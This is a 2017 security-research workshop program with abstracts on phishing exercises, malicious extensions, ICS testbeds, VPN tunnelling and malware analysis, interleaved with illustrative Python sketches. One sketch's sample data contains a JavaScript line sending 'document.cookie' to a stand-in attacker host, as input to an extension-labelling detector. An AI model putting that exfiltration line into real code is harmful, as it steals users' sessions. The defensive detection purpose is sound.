All sessions will be held in Grand Ballroom C unless otherwise noted.
The workshop papers are available for registered attendees to download now, and will be open to everyone beginning Monday, August 14. Paper abstracts are available to everyone now. Copyright to the individual works is retained by the author[s].
Monday, August 14, 2017
8:00 am–9:00 am
9:00 am–9:15 am
Program Co-Chairs: José M. Fernandez, École Polytechnique de Montréal, and Mathias Payer, Purdue University
9:15 am–10:45 am
Measuring at Internet Scale
Session Chair: Chao Zhang, Tsinghua University
Hossein Siadati, New York University; Sean Palka and Avi Siegel, Booz Allen Hamilton; Damon McCoy, New York University
Embedded phishing exercises, which send test phishing emails, are used by organizations to reduce their employees' susceptibility to this type of attack. Research studies seeking to evaluate the effectiveness of these exercises have generally been limited by small sample sizes, and have not been able to measure possible factors that might bias results. As a result, companies have had to create their own design and evaluation methods, with no framework to guide their efforts. Lacking such guidelines, it is often difficult to determine whether these exercises are truly effective, and whether reported results are statistically reliable.
In this paper, we conduct a systematic analysis of data from a large real world embedded phishing exercise that involved 19,180 participants from a single organization, and utilized 115,080 test phishing emails. The first part of our study focuses on developing methodologies to correct some sources of bias, enabling sounder evaluations of the efficacy of embedded phishing exercises and training. We then use these methods to perform an analysis of the effectiveness of this embedded phishing exercise, and through our analysis, identify how the design of these exercises might be improved.
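The statistical-reliability question raised above can be made concrete with a standard tool. The sketch below is not from the paper and the click counts are hypothetical; it uses a Wilson score interval to show how tight a click-rate estimate becomes at the study's scale of 115,080 test emails:

```python
import math

def wilson_interval(clicks, emails, z=1.96):
    """95% Wilson score confidence interval for a phishing click rate."""
    if emails == 0:
        raise ValueError("no emails sent")
    p = clicks / emails
    denom = 1 + z ** 2 / emails
    centre = (p + z ** 2 / (2 * emails)) / denom
    half = (z / denom) * math.sqrt(p * (1 - p) / emails + z ** 2 / (4 * emails ** 2))
    return centre - half, centre + half

# A hypothetical 5% click rate over 115,080 test emails:
low, high = wilson_interval(clicks=5754, emails=115080)
```

At this sample size the interval is only about a quarter of a percentage point wide, which is one reason the small-sample studies criticized above struggle to produce comparable results.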
Louis F. DeKoven, Stefan Savage, and Geoffrey M. Voelker, UCSD; Nektarios Leontiadis, Facebook
Browser extensions enhance the user experience in a variety of ways. However, to support these expanded services, extensions are provided with elevated privileges that have made them an attractive vector for attackers seeking to exploit Internet services. Such attacks are particularly vexing for the sites being abused because there is no standard mechanism for identifying which extensions are running on a user’s browser, nor is there an established mechanism for limiting the distribution of malicious extensions even when identified.
In this paper we describe an approach used at Facebook for dealing with this problem. We present a methodology whereby users exhibiting suspicious online behaviors are scanned (with permission) to identify the set of extensions in their browser, and those extensions are in turn labelled based on the threat indicators they contain. We have employed this methodology at Facebook for six weeks, identifying more than 1,700 lexically distinct malicious extensions. We use this labelling to drive user device clean-up efforts as well as to report to antimalware and browser vendors.
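The labelling step lends itself to a simple illustration. The indicator rules below are hypothetical (the paper does not publish its rule set); this sketches substring-based labelling of an extension's files:

```python
def label_extension(extension_files, indicators):
    """Label an extension by the threat indicators its files contain.

    extension_files: {filename: source text}
    indicators: {label: [indicator strings]}
    Returns the set of labels whose indicators appear in any file.
    """
    labels = set()
    for source in extension_files.values():
        for label, patterns in indicators.items():
            if any(p in source for p in patterns):
                labels.add(label)
    return labels

# Hypothetical extension source and indicator rules:
files = {"background.js": "fetch('http://evil.example/c?x=' + document.cookie)"}
rules = {"cookie-theft": ["document.cookie"],
         "ad-injection": ["insertAdjacentHTML"]}
print(label_extension(files, rules))  # {'cookie-theft'}
```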
Tavish Vaidya, Eric Burger, Micah Sherr, and Clay Shields, Georgetown University
This paper describes a set of experiments we conducted to answer the question: just how prevalent is Internet interception? That is, if we sent our most sensitive information (bank information, passwords, etc.) in the clear, should we expect to regret it?
For a little over a year, we sent different types of Internet traffic over unencrypted channels between multiple clients and servers located at geographically diverse locations around the globe. Our messages contained seemingly sensitive and valuable information, including login credentials for banking sites, password reset links, etc. In total, we found no instances in which our information was acted upon by an eavesdropper.
This paper details the numerous challenges—technical, legal, and ethical—of setting up and maintaining a year-long, large-scale honeytrap. We discuss some fundamental limitations of such an experiment, and argue why our results should not be misinterpreted to suggest that message encryption is gratuitous.
10:45 am–11:15 am
Break with Refreshments
11:15 am–12:45 pm
Testbeds and Large-Scale Experiments
Session Chair: Laura S. Tinnel, SRI International
Pains, Gains and PLCs: Ten Lessons from Building an Industrial Control Systems Testbed for Security Research
Benjamin Green, Anhtuan Lee, Rob Antrobus, Utz Roedig, David Hutchison, and Awais Rashid, Lancaster University, UK
Recent years have seen a number of cyber attacks targeting Industrial Control Systems (ICSs). Reports detailing the findings from such attacks vary in depth. Hands-on experimental research is, therefore, required to better understand and explore security challenges in ICSs. However, real-world production systems are often off-limits due to the potential impact such research could have on operational processes and, in turn, safety. On the other hand, software-based simulations cannot always reflect all the potential device/system states due to oversimplified assumptions when modelling the hardware in question. As a result, laboratory-based ICS testbeds have become a key tool for research on ICS security. Development of such a testbed is a costly, labour- and time-intensive activity that must balance a range of design considerations, e.g., diversity of hardware and software platforms against scalability and complexity. Yet there is little coverage in the existing literature of such design considerations, their implications, and how to avoid typical pitfalls. Each group of researchers embarks on this journey from scratch, learning through a painful process of trial and error. In this paper we address this gap by reflecting on over three years of experience building an extensive ICS testbed with a range of devices (e.g., PLCs, HMIs, RTUs) and software. We discuss the architecture of our testbed and reflect on our experience addressing issues of diversity, scalability, and complexity, and the design choices made to manage trade-offs amongst these properties.
Daniel Lukaszewski and Geoffrey Xie, Naval Postgraduate School
An important class of virtual private networks (VPNs) builds secure tunnels at the transport layer, leveraging TCP or UDP. Multipath TCP (MPTCP), an ongoing IETF effort that has been adopted into Linux and iOS, extends TCP to allow data to be delivered over multiple network interfaces and paths simultaneously. In this paper, using a testbed that can emulate a range of path characteristics between the VPN end points, we first empirically quantify the potential of MPTCP tunnels to increase the goodput of VPN communications when multiple data paths are available. We further design and implement a preliminary version of Multipath UDP (MPUDP) to address the adverse effect of the duplicated congestion control actions known to occur with a TCP-in-TCP tunnel. We observe that a severe asymmetry of path delays may cause an excessive amount of packet reordering at the receiving end and consequently degrade the overall performance of TCP-in-MPUDP tunnels. Moreover, we find a packet scheduler that tracks path delays and allocates more packets to the path(s) with shorter delay(s) to be an effective and relatively lightweight solution for MPUDP, compared with an elaborate data sequencing mechanism like the one used by MPTCP.
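The delay-tracking scheduler idea can be sketched in a few lines. This toy version is not the authors' implementation and its names are illustrative; it keeps an exponentially weighted moving average of per-path delay samples, much as TCP does for its smoothed RTT, and sends each packet on the currently fastest path:

```python
class DelayAwareScheduler:
    """Pick the tunnel path with the lowest smoothed delay."""

    def __init__(self, paths, alpha=0.125):
        self.alpha = alpha                     # EWMA weight, as in TCP's SRTT
        self.delay = {p: None for p in paths}  # smoothed delay (ms) per path

    def record_delay(self, path, sample_ms):
        cur = self.delay[path]
        if cur is None:
            self.delay[path] = sample_ms
        else:
            self.delay[path] = (1 - self.alpha) * cur + self.alpha * sample_ms

    def pick_path(self):
        # Unmeasured paths are treated as delay 0 so they get probed first.
        return min(self.delay, key=lambda p: self.delay[p] or 0.0)

sched = DelayAwareScheduler(["wifi", "lte"])
sched.record_delay("wifi", 20.0)
sched.record_delay("lte", 80.0)
next_path = sched.pick_path()  # the lower-delay path, "wifi"
```

A weighted allocation across paths would be a natural refinement; the point here is only that tracking delay per path is cheap compared with full MPTCP-style data sequencing.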
Lessons Learned from Using an Online Platform to Conduct Large-Scale, Online Controlled Security Experiments with Software Developers
Christian Stransky, CISPA, Saarland University; Yasemin Acar, Leibniz University Hannover; Duc Cuong Nguyen, CISPA, Saarland University; Dominik Wermke, Leibniz University Hannover; Doowon Kim and Elissa M. Redmiles, University of Maryland, College Park; Michael Backes, CISPA, Saarland University & MPI-SWS; Simson Garfinkel, U.S. Census Bureau & U.S. National Institute of Standards and Technology; Michelle L. Mazurek, University of Maryland, College Park; Sascha Fahl, Leibniz University Hannover
Security and privacy researchers are increasingly conducting controlled experiments focusing on IT professionals, such as software developers and system administrators. These professionals are typically more difficult to recruit than general end-users. In order to allow for distributed recruitment of IT professionals for security user studies, we designed Developer Observatory, a browser-based virtual laboratory platform that enables controlled programming experiments while retaining most of the observational power of lab studies. The Developer Observatory can be used to conduct large-scale, reliable online programming studies with reasonable external validity. We report on our experiences and lessons learned from two controlled programming experiments (n>200) conducted using Developer Observatory.
12:45 pm–2:00 pm
2:00 pm–4:00 pm
Frameworks for Static and Binary Analysis
Session Chair: Brendan Dolan-Gavitt, New York University
Enrico Mariconti, Jeremiah Onaolapo, Gordon Ross, and Gianluca Stringhini, University College London
Malware samples are created at a pace that makes it difficult for analysis to keep up. When analyzing an unknown malware sample, it is important to assess its capabilities to determine how much damage it can do to its victims, and to make prioritization decisions about which threats should be dealt with first. In a corporate environment, for example, a malware infection that is able to steal financial information is much more critical than one that is sending email spam, and should be dealt with at the highest priority. In this paper we present a statistical approach able to determine causality relations between a specific trigger action (e.g., a user visiting a certain website in the browser) and a malware sample's subsequent behavior. We show that we can learn the typology of a malware sample by presenting it with a number of trigger actions commonly performed by users, and studying to which events the malware reacts. We show that our approach is able to correctly infer causality relations between information-stealing malware and login events on websites, as well as between adware and websites containing advertisements.
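The core intuition, comparing how often the malware reacts shortly after a trigger with the base rate of that reaction, can be illustrated with a toy lift calculation. The paper's statistical test is more involved; this sketch and its event names are hypothetical:

```python
def causality_lift(events, trigger, reaction, window=5.0):
    """Estimate how much more likely `reaction` is within `window`
    seconds after `trigger`, relative to its base rate.

    events: time-sorted list of (timestamp, name) tuples.
    Returns P(reaction follows trigger) / P(reaction overall);
    a lift well above 1 suggests the sample reacts to that trigger.
    """
    triggers = [t for t, n in events if n == trigger]
    reactions = [t for t, n in events if n == reaction]
    if not triggers:
        return 0.0
    followed = sum(1 for t in triggers
                   if any(t < r <= t + window for r in reactions))
    p_after = followed / len(triggers)
    p_base = len(reactions) / len(events)
    return p_after / p_base if p_base else 0.0

# Hypothetical trace: exfiltration consistently follows login triggers.
trace = [(0.0, "login"), (1.0, "exfil"), (10.0, "browse"),
         (20.0, "login"), (21.0, "exfil")]
lift = causality_lift(trace, "login", "exfil")  # well above 1
```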
Francois Gagnon, Cegep Sainte-Foy; Frederic Massicotte, Canada’s Cyber Incident Response Centre
The mobile malware threat is fought by both static and dynamic analysis, two complementary approaches in need of constant sharpening. In this paper, static analysis is revisited to update and deepen knowledge about Android malware, correlate malicious samples through common artifacts, and further understand malware developers’ modus operandi. By looking at more than 200,000 malware samples, our study revealed interesting new insights such as: the presence of duplicated permissions in the manifest, the variation of the certificate validity period between malware and benign applications, the pertinence of looking at each sample’s certificate file name, and the presence of Android applications nested inside other applications (APKs inside APKs). We also seek to revisit previous findings from related work on Android static analysis in order to confirm or refute them. In some cases, our findings are significantly different from previous work (e.g., diversity of certificates used to sign malware). Therefore, since the Android malware landscape is evolving, we conclude that our overall knowledge must be kept up-to-date.
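Two of the artifacts mentioned above, duplicated permissions and APKs nested inside APKs, are easy to check for. The sketch below is illustrative only: real manifests are binary XML and would first need decoding with a tool such as aapt, so the permission list is assumed to be already extracted.

```python
import collections
import io
import zipfile

def duplicated_permissions(permissions):
    """Permissions declared more than once in a (pre-decoded) manifest."""
    counts = collections.Counter(permissions)
    return {p for p, c in counts.items() if c > 1}

def nested_apks(apk_bytes):
    """Entry names of APK files embedded inside an APK (APKs inside APKs).

    APKs are ZIP archives, so nested packages show up as .apk entries.
    """
    with zipfile.ZipFile(io.BytesIO(apk_bytes)) as z:
        return [n for n in z.namelist() if n.lower().endswith(".apk")]
```

For example, `duplicated_permissions(["INTERNET", "INTERNET", "SEND_SMS"])` flags the repeated `INTERNET` entry.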
Franck de Goër and Roland Groz, LIG - Univ. Grenoble Alpes; Laurent Mounier, Verimag - Univ. Grenoble Alpes
Memory management in a binary can be handled by a standard allocator (e.g., the libc allocator) or by a custom one. For many security and safety analyses focused on memory, knowledge of the allocator is a requirement. In this paper, we propose an approach to retrieve allocators in binaries, based on heuristics and a single execution, with scalable instrumentation. In addition, we propose a metric to evaluate the consistency of the detected allocator, in order to confirm or invalidate the result. Finally, we provide an open-source implementation and repeatable experiments. Preliminary results show that our approach successfully retrieves the standard libc allocator in coreutils programs as well as in mupdf, pdflatex, and readelf, and the custom embedded allocator in jasper. They also confirm the relevance of our consistency metric on these examples.
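A consistency metric of the kind described might, in a much-simplified, hypothetical form, score how allocator-like a candidate (alloc, free) pair behaves over one execution trace. This sketch is not the paper's metric; it measures the fraction of free calls whose argument was previously returned, and not yet freed, by the candidate allocator:

```python
def allocator_consistency(trace):
    """Score a candidate (alloc, free) pair over one execution trace.

    trace: list of ("alloc", addr) and ("free", addr) events, in order.
    Returns the fraction of free() arguments that match a live pointer
    previously returned by alloc; 1.0 means perfectly consistent.
    """
    live = set()
    matched = frees = 0
    for op, addr in trace:
        if op == "alloc":
            live.add(addr)
        else:
            frees += 1
            if addr in live:
                matched += 1
                live.discard(addr)
    return matched / frees if frees else 1.0
```

A low score would invalidate the candidate: it frequently "frees" pointers it never handed out, so it is unlikely to be the program's allocator.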
Invited Talk: Overlooked Foundations: Exploits as Experiments and Constructive Proofs in the Science-of-Security
Sergey Bratus, Dartmouth College
"The most important property of a program is whether it accomplishes the intentions of the user.” With these words, C.A.R. Hoare opened up his research programme, which we now recognize as a key part to the science of security—a still-nascent science, as Herley and Van Oorschot persuasively argued. Too many parts of that science are too well described by the Einstein quote about Mathematics, “As far as the laws of Mathematics refer to reality they are not certain, and as far as they are certain they do not refer to reality”—largely due to the difficulties of mathematically describing the user intentions and their deviations from reality.
Yet there is a part of security that is both precise and certain, and answers to the best standards of experimental and evidentiary approaches of established sciences. It is the part dealing with exploitation of computing systems.
4:00 pm–4:30 pm
Break with Refreshments
4:30 pm–5:30 pm
Chair: Mathias Payer, Purdue University
Panelists: Geoff Voelker, University of California, San Diego; Micah Sherr, Georgetown University; Adam Doupé, Arizona State University